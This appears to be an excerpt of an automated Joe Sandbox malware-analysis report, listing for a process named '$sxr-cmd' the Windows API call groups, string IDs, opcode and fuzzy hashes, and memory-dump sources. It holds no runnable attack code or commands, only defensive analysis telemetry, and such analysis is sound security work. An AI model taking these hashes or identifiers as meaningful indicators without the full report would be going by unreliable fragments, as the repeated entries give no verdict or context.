                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                      • String ID: ELSE$IF/?
                                                                                                                      • API String ID: 3223794493-1134991328
                                                                                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                      • Instruction ID: 6717c937f5e1b3b0c8c4bd42f7cef92b6425a0e97f37be57df7312fd1e23a2e3
                                                                                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                      • Instruction Fuzzy Hash: A6413835E09E43C2FA649F6CA4112B9A7A1AF46F68F546036D54EC76B5EF3CEC208701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532185241-0
                                                                                                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                      • Instruction ID: 174b6ccaff31030ecbc139f8072b55f17b836355c52b09e6150a361805b7635b
                                                                                                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                      • Instruction Fuzzy Hash: 66419D36A04A518BE7549F21948557DBFA1FB88FA0F459535EA0A837A1CF3CEC418700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3588551418-0
                                                                                                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                      • Instruction ID: 7718d184248390872431a5ac4b4b74619e90aeb218cf85a6950effa8b56d578e
                                                                                                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                      • Instruction Fuzzy Hash: F5416F79A08A428BE7549F15A49027DF761EF85FA1F14403AD64EC77A1CF3CEC408780
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2123716050-0
                                                                                                                      • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                      • Instruction ID: 2ea282085da4ecf76a9724d055da6f56cf404363a66b57373bb8128daac7b012
                                                                                                                      • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                      • Instruction Fuzzy Hash: 9D419536705BC18AEB718F25D8903E9A7A4FB49F9CF444135DA4D8AAA9DF3CD6448700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3114114779-0
                                                                                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                      • Instruction ID: 0a10b3110482f6df5d8d8b000d71f84899aeb7c0a0de8e124679bc8ed9f3c66d
                                                                                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                      • Instruction Fuzzy Hash: 9041F736A05E42CAEB00CF79D4802ACBBA5FB88F58F554136DA0D93B64DF38E9568750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A77A
                                                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A7AF
                                                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A80E
                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A839
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A850
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2240656346-0
                                                                                                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                      • Instruction ID: 0ae3cc092ae08aaeb107d338dacee4f518e117ef9645092a324e52652b4687ed
                                                                                                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                      • Instruction Fuzzy Hash: 24318B3AA18E4192E7118F24E480569FBF5FB89FA0F554035EA4E82764DF3CDC41CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6155001B8: _get_osfhandle.MSVCRT ref: 00007FF6155001C4
                                                                                                                        • Part of subcall function 00007FF6155001B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF6155001D6
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF61551D0F9
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF61551D10F
                                                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF61551D166
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF61551D17A
                                                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF61551D18C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008996577-0
                                                                                                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                      • Instruction ID: 57d24f8bc0841c36b5d9bba1c6af11819cfd99d1ee2735a16d4e4e464ff49653
                                                                                                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                      • Instruction Fuzzy Hash: FA215C2AB14A41CAE7009B71E8400BDB7B0FB8DF65B445125DE4D93B69EF38D441CB14
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: 505527e6e766f6252cc75d56a5348e578c7830a1af3cc1d60b9eeb1fb2835866
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: 62119422A7DB0201F65C11E7D45D36F10A3AB57374EC40624BAFF2EED7BA2649415200
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: abd8314576678b675f38856d93150327ec156046a275fb1cc8adf56ad844f934
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: DE11C422A0DB0103F658A1E5D45D36540F36F67B70E940638EA7E2F2D7AB1B4D814200
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1092925422-0
                                                                                                                      • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction ID: 22be293b0064e3789735749459075c394cc6aa00c845e6bca34463c908d19b7d
                                                                                                                      • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction Fuzzy Hash: A6114236A0AB4087FB24CB92E44965977B2F745B90F844125DE4D0B795FF3EC544C744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF61551C9EE,?,?,?,00007FF61551EA6C,?,?,?,00007FF61551E925), ref: 00007FF615505CCB
                                                                                                                      • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00007FF61551C9EE,?,?,?,00007FF61551EA6C,?,?,?,00007FF61551E925), ref: 00007FF615505CDF
                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF615505D03
                                                                                                                      • fprintf.MSVCRT ref: 00007FF61550F4A9
                                                                                                                      • fflush.MSVCRT ref: 00007FF61550F4C2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1826527819-0
                                                                                                                      • Opcode ID: 9b0532f4637facb70c38994ad755a75d253ca2745f37b53511dc5f2b70e91ec1
                                                                                                                      • Instruction ID: a1453f606d52e435482f1155f137b5ec07cad069f7685769ac378f9a1e65ecba
                                                                                                                      • Opcode Fuzzy Hash: 9b0532f4637facb70c38994ad755a75d253ca2745f37b53511dc5f2b70e91ec1
                                                                                                                      • Instruction Fuzzy Hash: 35012D39908E82CAE6045B25E4452B9FF60FF8AF65F455135E94F873B6CF3C98848B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateSemaphore
                                                                                                                      • String ID: _p0$wil
                                                                                                                      • API String ID: 1078844751-1814513734
                                                                                                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                      • Instruction ID: 3b8547038da9c36ea2fcbf3eb56670bacf9b83c02ad24d6886184bb7d7b5d583
                                                                                                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                      • Instruction Fuzzy Hash: 7551EA69B19F4286EE618F2494D46B9E6B0EF84FA8F584435DA0E877A1DF3CDD05CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction ID: 64ef111a82d18d7279379f6b3c5cab9f2b6be29086430d43ec5c4d949642dd2f
                                                                                                                      • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction Fuzzy Hash: 3351913671B702CAEF54CB96D80CB1DBBA7F350BA8F508160DA5A47B8AFB75D8418700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF61551B934
                                                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF615505085), ref: 00007FF61551B9A5
                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF615505085), ref: 00007FF61551B9F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                      • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                      • API String ID: 1103618819-1745581171
                                                                                                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                      • Instruction ID: a86fb06366670937666b6bc84517d0a89c60fe8f6da74958b5eaa7b28eb10668
                                                                                                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                      • Instruction Fuzzy Hash: 8C41846A908E85C2EA108F159450279B7B0FB49FB4F455235DA4E837A5EF3CE946C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$_wcslwr
                                                                                                                      • String ID: [%s]
                                                                                                                      • API String ID: 886762496-302437576
                                                                                                                      • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                      • Instruction ID: 109c9b2e06963d2ea216c01bbe4748be2286a270d7f004293388043172978270
                                                                                                                      • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                      • Instruction Fuzzy Hash: AC317A36705B8685EB21CF25D8903E9A7A0FB89F98F454136DE8D8BB65DF3CDA458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction ID: 59738324d63b246577fe5d39c241a73e1a3c835c3f00ea82d4607fe070961c4e
                                                                                                                      • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction Fuzzy Hash: 0E31B03121A741D6EB14DF93EC4C71D7B76F750BA8F448154AE9A0BB86EB39C941CB04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswspace
                                                                                                                      • String ID: off
                                                                                                                      • API String ID: 2389812497-733764931
                                                                                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                      • Instruction ID: 7abea5cac25031e77521ca658650804c4a67e4df32daec49b0cd828591c3ec74
                                                                                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
